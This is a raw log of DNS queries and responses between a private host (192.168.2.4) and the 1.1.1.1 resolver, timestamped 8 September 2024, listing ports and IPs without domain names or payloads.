                                                                                                                                                                                                            Sep 8, 2024 09:00:29.046578884 CEST53493611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.049237013 CEST6421053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.049276114 CEST53582701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.051295996 CEST5560253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054205894 CEST5001053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054507017 CEST53533411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054773092 CEST4961253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.058564901 CEST6334053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.058809996 CEST53642101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059580088 CEST6008453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059842110 CEST5762353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060029030 CEST5501653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060473919 CEST5396153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060683966 CEST5087353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060883045 CEST6118553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061512947 CEST5700153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061876059 CEST6295153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061975002 CEST5538253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062109947 CEST5689153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062223911 CEST4954353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063462973 CEST6023253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063647032 CEST6134753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063831091 CEST5032953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.064554930 CEST53496121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.067181110 CEST53556021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.067257881 CEST6492353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.068629026 CEST53633401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069312096 CEST53600841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069498062 CEST53539611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069914103 CEST53500101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069930077 CEST53508731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069941044 CEST53611851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.070240021 CEST53613471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.070847034 CEST53570011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071012974 CEST53629511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071023941 CEST53553821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071611881 CEST53495431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.072699070 CEST53602321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.072837114 CEST53550161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.073729038 CEST53503291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.075195074 CEST5104253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.076566935 CEST53576231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.077785015 CEST53568911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST5589353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST5226653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080390930 CEST5586353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090260983 CEST53522661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090387106 CEST53558631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090682030 CEST53558931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090986013 CEST53649231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.105345011 CEST53510421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.140460014 CEST53639921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183383942 CEST53622881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183713913 CEST53503751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183934927 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.197628021 CEST53589871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.649528980 CEST5558053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657603979 CEST5857853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657672882 CEST6355053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658379078 CEST5201253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658463001 CEST5673053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658953905 CEST5261853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659473896 CEST6085753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659483910 CEST6201753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659488916 CEST53555801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.660043001 CEST5779053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.662333965 CEST5930353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.663938999 CEST5408053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.664427996 CEST5050253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.665617943 CEST5328353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.666142941 CEST6139353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.667268038 CEST53520121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.667319059 CEST53635501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.668716908 CEST53567301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.669244051 CEST53526181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670207024 CEST6022553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670342922 CEST53577901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670356035 CEST53608571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670707941 CEST5057253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671252966 CEST6156253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671746969 CEST53593031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.673577070 CEST53585781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.674283028 CEST53505021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.675086975 CEST53620171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.676008940 CEST53613931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679363966 CEST5866753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679517031 CEST53540801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.680676937 CEST53505721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.682884932 CEST6135953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.686012983 CEST53602251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687088013 CEST53615621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687446117 CEST5203553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427248955 CEST53531821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427424908 CEST53521981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427587032 CEST53623261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427598000 CEST53572041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.429157019 CEST53557441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.429425955 CEST53640441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.430167913 CEST53537351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.431422949 CEST53525401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.431528091 CEST53616061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.433758974 CEST5333653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.434087038 CEST5617653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.434458971 CEST53545801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.435661077 CEST53498261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.437161922 CEST6044553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.442790031 CEST53533361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.445322990 CEST53549391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.446120024 CEST53604451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.453361034 CEST5681953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.459084988 CEST6027953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.463371992 CEST53568191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.473381042 CEST5797853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.475089073 CEST53602791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.491203070 CEST53579781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.508884907 CEST5929153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.509584904 CEST5251753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.509938955 CEST5262653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510267019 CEST5809553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510639906 CEST6349653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510713100 CEST6193353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511032104 CEST6207453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511223078 CEST6454853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511356115 CEST5379353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511603117 CEST6487653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511744022 CEST5158653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.514334917 CEST5667653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.515816927 CEST5226953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.516436100 CEST5944353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.517182112 CEST5712153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.518608093 CEST5288153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.518625975 CEST5538453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.519190073 CEST53592911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.519701958 CEST53525171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520029068 CEST53634961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520354986 CEST6477653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520478010 CEST53619331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520786047 CEST53620741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520796061 CEST53537931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.521095991 CEST53645481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.522048950 CEST53648761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.523591042 CEST6053053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.523751020 CEST53566761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.524122953 CEST6547053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.524508953 CEST5413153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.524559975 CEST53522691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.525804043 CEST5150753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.525831938 CEST53526261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526159048 CEST53594431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526437044 CEST6361953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526854992 CEST53571211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526875019 CEST4966053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.527103901 CEST53580951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.527133942 CEST6159953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.527596951 CEST6197953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.528529882 CEST53515861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.529006004 CEST5097053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.529633999 CEST5921553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.530271053 CEST53647761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.533421993 CEST53528811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.534337044 CEST53654701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.534878016 CEST53553841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.534993887 CEST53515071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.535005093 CEST53541311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.535651922 CEST53636191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.536858082 CEST53615991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.545725107 CEST53592151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.554244041 CEST53605301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.557955027 CEST53496601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.557981014 CEST53619791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.560022116 CEST53509701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.582241058 CEST53545081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.594490051 CEST53561761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.599558115 CEST4959253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.630579948 CEST53495921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.907922029 CEST5932553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.909954071 CEST5301353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.910505056 CEST5605753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.920248985 CEST53560571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.920286894 CEST5384553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.921262980 CEST6456453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.921998978 CEST5379653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.922640085 CEST5684153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923008919 CEST5530653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923154116 CEST4978653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923815966 CEST6474953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.924256086 CEST5739353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.924732924 CEST6050453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.927309036 CEST5733353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.928396940 CEST5672653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.928597927 CEST53593251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.929908991 CEST53538451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.929925919 CEST53530131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.931751966 CEST53553061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.932256937 CEST53568411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.932419062 CEST53497861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.934386015 CEST53647491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.727727890 CEST5173753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.727757931 CEST4935453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.728070974 CEST53574011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.729636908 CEST5318353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.731837988 CEST53589711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.734286070 CEST53617781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.741496086 CEST53529571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.741764069 CEST5864353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742116928 CEST5534353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742343903 CEST53597131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742784977 CEST4956453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742966890 CEST5536353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743180037 CEST6479853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743478060 CEST5677653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744023085 CEST6416453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744348049 CEST5757253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744944096 CEST5226553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.745270014 CEST53493541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.746376038 CEST53531831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.746594906 CEST53576701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.752523899 CEST53553631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.753243923 CEST53495641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.753577948 CEST53647981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.754409075 CEST53567761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.755075932 CEST53575721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.758347034 CEST53638551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.758882999 CEST53586431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.760996103 CEST53641641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.762130022 CEST53522651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.762372971 CEST53517371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767381907 CEST6245053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767510891 CEST6143353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767792940 CEST5349153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768018961 CEST6139753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768217087 CEST5547253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768287897 CEST5070353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768491030 CEST5624353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768692017 CEST6088853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768870115 CEST5782453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769068956 CEST6164953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769145012 CEST4973253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769341946 CEST5348653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769409895 CEST4962153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769598961 CEST5992153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769701958 CEST5307053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769861937 CEST6233553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769962072 CEST5573153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770124912 CEST5792453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770200014 CEST4924353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770445108 CEST6347253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770536900 CEST5736653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770842075 CEST5362753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771100044 CEST5556253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771349907 CEST5800053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.772331953 CEST5593853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773360968 CEST6263853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773485899 CEST53553431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773536921 CEST5566353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773694992 CEST6198453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773853064 CEST5535453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.774285078 CEST5652653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.776238918 CEST53624501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.777992964 CEST6134953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778342009 CEST53534861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778717041 CEST53497321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778728008 CEST53579241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778759956 CEST53616491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778970957 CEST53578241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.779764891 CEST53557311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.780467033 CEST53599211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.781832933 CEST53556631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.781898975 CEST53634721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782001972 CEST53536271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782011986 CEST53562431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782016993 CEST53559381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782393932 CEST53580001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782407999 CEST53555621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782434940 CEST53573661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782762051 CEST53553541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782989025 CEST53619841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.783740044 CEST53626381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.784178972 CEST53507031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.784415960 CEST53613971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.786705017 CEST53623351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.786968946 CEST53530701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.787775040 CEST53613491.1.1.1192.168.2.4
